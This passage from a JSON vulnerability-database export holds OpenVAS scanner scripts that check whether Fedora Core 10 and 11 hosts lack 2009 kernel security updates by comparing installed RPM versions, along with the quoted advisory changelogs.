value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8684 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515867\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:59", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8684.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8684 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2767", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64707", "href": "http://plugins.openvas.org/nasl.php?oid=64707", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8684.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8684 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix oops in clock_nanosleep syscall which allows an ordinary user to cause a\nnull ptr dereference in the kernel. CVE-2009-2767. Fixes BUG_ON() in the intel\ngem page fault code breaking GNOME Shell.\n\nChangeLog:\n\n* Sat Aug 15 2009 Kyle McMartin 2.6.29.6-217.2.8\n- CVE-2009-2767: Fix clock_nanosleep NULL ptr deref.\n* Fri Aug 14 2009 Kyle McMartin 2.6.29.6-217.2.7\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Thu Aug 13 2009 Kristian H\u00f8gsberg - 2.6.29.6-217.2.6\n- Backport 0e7ddf7e to fix bad BUG_ON() in i915 gem fence management\ncode. Adds drm-i915-gem-bad-bug-on.patch, fixes #514091.\n* Wed Aug 12 2009 John W. Linville 2.6.29.6-217.2.5\n- iwlwifi: fix TX queue race\n* Mon Aug 10 2009 Jarod Wilson 2.6.29.6-217.2.4\n- Add tunable pad threshold support to lirc_imon\n- Blacklist all iMON devices in usbhid driver so lirc_imon can bind\n- Add new device ID to lirc_mceusb (#512483)\n- Enable IR transceiver on the HD PVR\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8684\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8684.\";\n\n\n\nif(description)\n{\n script_id(64707);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2767\", \"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8684 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515867\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:18", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8264.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8264 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64551", "href": "http://plugins.openvas.org/nasl.php?oid=64551", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8264.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8264 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to linux kernel 2.6.27.29:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.26\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.27\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.28\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.29\n\nFixes security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407\n\nChangeLog:\n\n* Fri Jul 31 2009 Chuck Ebbert 2.6.27.29-170.2.78\n- The kernel package needs to override the new rpm %install behavior.\n* Thu Jul 30 2009 Chuck Ebbert 2.6.27.29-170.2.77\n- Linux 2.6.27.29\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.29-170.2.75.rc1\n- Linux 2.6.27.29-rc1 (CVE-2009-2406, CVE-2009-2407)\n- Drop linux-2.6-netdev-r8169-avoid-losing-msi-interrupts.patch, now in -stable.\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.28-170.2.74\n- Don't bounce virtio_blk requests (#510304)\n* Mon Jul 27 2009 Chuck Ebbert 2.6.27.28-170.2.73\n- Linux 2.6.27.28 (CVE-2009-1895, CVE-2009-1897)\nDropped patches, merged in stable:\nlinux-2.6-kbuild-fix-unifdef.c-usage-of-getline.patch\nlinux-2.6-netdev-r8169-fix-lg-pkt-crash.patch\nNew config item:\nCONFIG_DEFAULT_MMAP_MIN_ADDR=32768\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8264\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8264.\";\n\n\n\nif(description)\n{\n script_id(64551);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8264 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512861\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512885\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:56", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8647.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8647 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064703", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064703", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8647.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8647 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix sock_sendpage null pointer dereference. CVE-2009-2692.\n\nChangeLog:\n\n* Fri Aug 14 2009 Kyle McMartin 2.6.27.29-170.2.79\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Fri Jul 31 2009 Chuck Ebbert 2.6.27.29-170.2.78\n- The kernel package needs to override the new rpm %install behavior.\n* Thu Jul 30 2009 Chuck Ebbert 2.6.27.29-170.2.77\n- Linux 2.6.27.29\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.29-170.2.75.rc1\n- Linux 2.6.27.29-rc1 (CVE-2009-2406, CVE-2009-2407)\n- Drop linux-2.6-netdev-r8169-avoid-losing-msi-interrupts.patch, now in -stable.\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.28-170.2.74\n- Don't bounce virtio_blk requests (#510304)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8647\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8647.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64703\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8647 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516949\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = 